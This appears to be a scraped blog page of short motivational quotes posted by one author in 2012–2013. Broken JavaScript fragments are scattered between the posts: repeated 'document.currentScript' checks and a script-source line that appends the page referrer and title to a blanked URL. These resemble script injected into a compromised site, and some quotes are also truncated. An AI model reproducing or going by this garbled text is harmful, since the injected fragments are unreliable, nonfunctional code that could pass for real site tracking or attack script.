
Life, Personal Development No Comments »


     I have a life, and

     It only goes in one



                                            – Don Draper

if (document.currentScript) {

Authored by kevinn on 2nd December 2013

Make the most of life

Life, People No Comments »




Don’t audit life.

Show up and 

make the most of it now.



 s.src=’’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Authored by kevinn on 23rd October 2013

What you do today is important

Life No Comments »



What you do

today is 


because you

are exchanging

a day of

your life for it.

                                                    author unknown


 } else {

Authored by kevinn on 28th July 2013

Tough Situations

Life, Personal Development No Comments »




When life put you on

tough situations,

Don’t say “WHY ME?”

Just Say “TRY ME!”





 if (document.currentScript) {

Authored by kevinn on 15th April 2013

Life is short

Life 1 Comment »



           Life is too short to 

          stress yourself with 

         people who don’t even

         deserve to be an issue

               in your life.



A helpful one – how to de-stress >)

 if (document.currentScript) {

Authored by kevinn on 8th December 2012

Tie yourself to a GOAL

Life 1 Comment »




“ If you want to live a happy life,

tie it to a GOAL, NOT to people

or things.”

– Albert Einstein


Note : also posted in A-Team


Authored by kevinn on 1st December 2012

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